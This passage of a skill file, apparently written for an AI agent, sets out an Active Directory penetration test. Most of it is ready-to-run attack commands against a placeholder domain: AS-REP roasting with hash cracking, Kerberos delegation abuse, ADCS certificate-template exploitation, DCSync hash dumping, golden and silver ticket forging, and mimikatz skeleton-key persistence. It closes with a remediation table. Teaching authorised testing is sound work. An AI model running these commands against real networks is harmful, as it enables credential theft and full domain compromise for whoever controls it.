Roasting","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Target accounts without pre-authentication\nimpacket-GetNPUsers 'corp.local/' -usersfile users.txt -dc-ip 10.0.0.5 \\\n -outputfile asrep.txt 
-format hashcat\n\n# Crack AS-REP hashes (mode 18200)\nhashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Kerberos Delegation Attacks","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Unconstrained delegation — extract TGTs from memory\n# If you compromise a host with unconstrained delegation:\n.\\Rubeus.exe monitor /interval:5 /nowrap\n# Force authentication from DC using PrinterBug/SpoolSample\n.\\SpoolSample.exe DC01.corp.local YOURHOST.corp.local\n.\\Rubeus.exe ptt /ticket:\u003cbase64_ticket>\n\n# Constrained delegation — S4U abuse\nimpacket-getST 'corp.local/svc_web:WebPass123' -spn 'CIFS/fileserver.corp.local' \\\n -dc-ip 10.0.0.5 -impersonate administrator\nexport KRB5CCNAME=administrator.ccache\nimpacket-psexec 'corp.local/[email protected]' -k -no-pass\n\n# Resource-Based Constrained Delegation (RBCD)\nimpacket-addcomputer 'corp.local/testuser:Password123' -computer-name 'EVIL
\\\n -computer-pass 'EvilPass123' -dc-ip 10.0.0.5\npython3 rbcd.py -delegate-to 'TARGET
-delegate-from 'EVIL
\\\n -dc-ip 10.0.0.5 'corp.local/testuser:Password123'\nimpacket-getST 'corp.local/EVIL$:EvilPass123' -spn 'CIFS/target.corp.local' \\\n -impersonate administrator -dc-ip 10.0.0.5","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Phase 3 — ADCS (Active Directory Certificate Services) Attacks","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Enumerate ADCS with Certipy\ncertipy find -u '[email protected]' -p 'Password123' -dc-ip 10.0.0.5 \\\n -vulnerable -stdout\n\n# ESC1 — Vulnerable certificate template (enrollee can specify SAN)\ncertipy req -u '[email protected]' -p 'Password123' \\\n -target ca.corp.local -ca CORP-CA \\\n -template VulnerableWebServer -upn [email protected]\n\n# Authenticate with the certificate\ncertipy auth -pfx administrator.pfx -dc-ip 10.0.0.5\n\n# ESC4 — Template ACL misconfiguration\n# Modify template to enable ESC1 conditions, then exploit as above\n\n# ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2 flag on CA\ncertipy req -u '[email protected]' -p 'Password123' \\\n -target ca.corp.local -ca CORP-CA \\\n -template User -upn [email protected]\n\n# ESC8 — NTLM relay to HTTP enrollment endpoint\ncertipy relay -target 'http://ca.corp.local/certsrv/certfnsh.asp' \\\n -template DomainController","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Phase 4 — Domain Privilege Escalation","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"DCSync Attack","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# DCSync — extract all domain hashes (requires replication rights)\nimpacket-secretsdump 'corp.local/domainadmin:[email protected]' -just-dc\n\n# DCSync specific user\nimpacket-secretsdump 'corp.local/domainadmin:[email protected]' \\\n -just-dc-user krbtgt\n\n# With Mimikatz (Windows)\nmimikatz# lsadump::dcsync /domain:corp.local 
/user:krbtgt","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Golden Ticket","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Create Golden Ticket (requires krbtgt hash and domain SID)\nimpacket-ticketer -nthash \u003ckrbtgt_nthash> -domain-sid S-1-5-21-... \\\n -domain corp.local administrator\nexport KRB5CCNAME=administrator.ccache\nimpacket-psexec 'corp.local/[email protected]' -k -no-pass\n\n# With Mimikatz\nmimikatz# kerberos::golden /user:administrator /domain:corp.local \\\n /sid:S-1-5-21-... /krbtgt:\u003chash> /ptt","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Silver Ticket","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Create Silver Ticket for specific service\nimpacket-ticketer -nthash \u003cservice_nthash> -domain-sid S-1-5-21-... \\\n -domain corp.local -spn MSSQL/sqlserver.corp.local administrator\n\nexport KRB5CCNAME=administrator.ccache\nimpacket-mssqlclient 'corp.local/[email protected]' -k -no-pass","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Phase 5 — Persistence Demonstration","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Skeleton Key (inject into LSASS — authorized testing only)\nmimikatz# privilege::debug\nmimikatz# misc::skeleton\n# Now any user can authenticate with \"mimikatz\" as password\n\n# AdminSDHolder persistence\n# Add controlled user to AdminSDHolder ACL\n# SDProp process propagates ACL to all protected groups every 60 minutes\n\n# SID History injection\n# Inject Domain Admin SID into low-privilege user's SID history\n\n# Document all persistence mechanisms and clean up after testing","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Findings and 
Remediation","type":"text"}]},{"type":"table","attrs":{"layout":null},"content":[{"type":"tr","content":[{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Finding","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"CVSS","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Remediation","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Kerberoastable accounts with weak passwords","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"7.5","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Use gMSA, enforce 25+ char passwords for service accounts","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Unconstrained delegation on servers","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"8.1","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Remove unconstrained delegation, use constrained or RBCD","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Vulnerable ADCS templates 
(ESC1-ESC8)","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"9.8","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Audit templates, remove dangerous permissions, require approval","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"DCSync permissions on non-DA accounts","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"9.8","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Audit replication rights, implement tiered admin model","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"LLMNR/NBT-NS enabled","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"8.1","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Disable via GPO","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"No LAPS deployed","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"7.2","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Deploy Windows LAPS for local admin 
management","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Weak domain password policy","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"6.5","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Enforce 14+ chars, implement fine-grained password policies","type":"text"}]}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"References","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"BloodHound: https://github.com/BloodHoundAD/BloodHound","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Impacket: https://github.com/fortra/impacket","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Certipy: https://github.com/ly4k/Certipy","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"HackTricks AD: https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/index.html","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SpecterOps AD Security: https://specterops.io/blog/","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"MITRE ATT&CK: 
https://attack.mitre.org/","type":"text"}]}]}]},{"type":"hr","attrs":{"markup":"---"}}]},"metadata":{"date":"2026-06-05","name":"performing-active-directory-penetration-test","tags":["active-directory","BloodHound","Kerberoasting","Impacket","DCSync","ADCS","domain-compromise","privilege-escalation"],"author":"@skillopedia","domain":"cybersecurity","source":{"stars":13207,"repo_name":"anthropic-cybersecurity-skills","origin_url":"https://github.com/mukul975/anthropic-cybersecurity-skills/blob/HEAD/skills/performing-active-directory-penetration-test/SKILL.md","repo_owner":"mukul975","body_sha256":"290e31bdb7e04c2fb4df1c498b884b9fb45a2fcc1aef21c45dc795006169410a","cluster_key":"392ad2dc7fdda0988777a0cfc545adfd25b61e646842cc7f96a370b31dc94d95","clean_bundle":{"format":"clean-skill-bundle-v1","source":"mukul975/anthropic-cybersecurity-skills/skills/performing-active-directory-penetration-test/SKILL.md","attachments":[{"id":"0028e52f-0619-54b9-90e3-d29d94f53cc7","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/0028e52f-0619-54b9-90e3-d29d94f53cc7/attachment.md","path":"assets/template.md","size":1195,"sha256":"8b93883692ca2fa529d3ca3c6b175e36c324c984dc4471e91df38c6547ee15a0","contentType":"text/markdown; charset=utf-8"},{"id":"25d121ca-3680-57fd-b882-05b61f032573","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/25d121ca-3680-57fd-b882-05b61f032573/attachment.md","path":"references/api-reference.md","size":2314,"sha256":"6a7461913dd1dab7527085cf527f9d54ed1ece0094c88abd804e25396c9fbae8","contentType":"text/markdown; charset=utf-8"},{"id":"583ef094-ae3d-5c95-96e7-7f90454e7386","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/583ef094-ae3d-5c95-96e7-7f90454e7386/attachment.md","path":"references/standards.md","size":1125,"sha256":"524522d0429f13e2365f1c528a14abe420c632a3b2b040be2d3cd067af11666e","contentType":"text/markdown; 
charset=utf-8"},{"id":"c2e2ea7a-8d64-5d43-955b-f9b36bc65d6a","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/c2e2ea7a-8d64-5d43-955b-f9b36bc65d6a/attachment.md","path":"references/workflows.md","size":1169,"sha256":"d0673170c78afcb6d6c1639581c2e393562061c69a23027b0253f1a5fc6dcb55","contentType":"text/markdown; charset=utf-8"},{"id":"b5739a51-6ee1-5c84-bd9f-ee46e1b38245","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/b5739a51-6ee1-5c84-bd9f-ee46e1b38245/attachment.py","path":"scripts/agent.py","size":7053,"sha256":"4700864467979a016686de234dd11fc993c39055f29abff7477bafd38063eb82","contentType":"text/x-python; charset=utf-8"},{"id":"c1675881-4729-5355-b637-d8974c166f44","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/c1675881-4729-5355-b637-d8974c166f44/attachment.py","path":"scripts/process.py","size":6938,"sha256":"8a29b6c102e08f7d94aa52e16340ec541edc2f99d795933b460e31a08f70dec0","contentType":"text/x-python; charset=utf-8"}],"bundle_sha256":"a0d8e61af9436b5f4cda16bb83be54f45d43ee64bd4cf718d470ac5e1c8587ab","attachment_count":6,"text_attachments":6,"attachment_storage":"skillopedia-attachments-v1","binary_attachments":0,"excluded_attachments":[]},"cluster_size":1,"skill_md_path":"skills/performing-active-directory-penetration-test/SKILL.md","import_metadata":{"date":"2026-06-05","author":"@skillopedia","version":"v1","category":"testing-qa","category_label":"Testing"},"exact_dupes_collapsed_into_this":0},"license":"Apache-2.0","version":"v1","category":"testing-qa","nist_csf":["ID.RA-01","ID.RA-06","GV.OV-02","DE.AE-07"],"subdomain":"penetration-testing","import_tag":"clean-skills-v1","description":"Conduct a focused Active Directory penetration test to enumerate domain objects, discover attack paths with BloodHound, exploit Kerberos weaknesses, escalate privileges via ADCS/DCSync, and demonstrate domain compromise."}},"renderedAt":1782988160749}